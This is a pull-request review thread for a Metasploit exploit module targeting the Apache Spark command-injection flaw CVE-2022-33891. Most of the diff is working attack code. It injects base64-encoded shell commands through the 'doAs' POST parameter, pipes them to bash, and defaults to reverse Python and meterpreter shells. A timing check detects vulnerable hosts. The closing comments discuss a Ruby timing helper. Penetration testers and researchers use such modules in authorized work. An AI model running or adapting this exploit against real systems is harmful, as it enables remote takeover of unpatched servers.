modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb

```diff
@@ -0,0 +1,136 @@
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability
+          'H00die Gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module
+        ],
+        'References' => [
+          ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure
+          ['URL', 'https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891'], # Analysis
+          ['CVE', '2022-33891']
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :in_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'CmdStagerFlavor' => ['printf'],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2022-07-18',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
+      ]
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    b64 = Rex::Text.encode_base64(cmd)
+    post_data = "doAs=\`echo #{b64} | base64 -d | bash\`"
+
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/'),
+      'data' => post_data
+    })
+  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
+    return nil
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited!")
+
+    res = execute_command("echo #{Rex::Text.rand_text_alpha_lower(8..12)}")
+
+    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
+
+    if res.code != 403
+      return CheckCode::Safe("The #{peer} did not respond a 403 response.")
+    end
+
+    print_status('Perform sleep test of 10 seconds...')
+    t1 = Time.now
+    res = execute_command('sleep 10')
+    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
+
+    t2 = Time.now
+    delta = t2 - t1
```

Comment:
We normally use the pattern of:

https://github.com/rapid7/metasploit-framework/blob/7f6d661ff7ce0e0663e78b5c762470093cb1c537/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb#L85-L98

The implementation is similar to your approach:

https://github.com/rapid7/rex-core/blob/1e43b174888d673a045aead891ed9c4085ad85f7/lib/rex/stopwatch.rb#L15-L21

But it deals with some clock issues:

https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/

Reply:
You shouldn't need the `{ disconnect: false }` argument :+1:

Reply:
Cool. Learned something ;-). Let me apply the code, test and commit it again.

Reply:
Added this in latest commit 797e450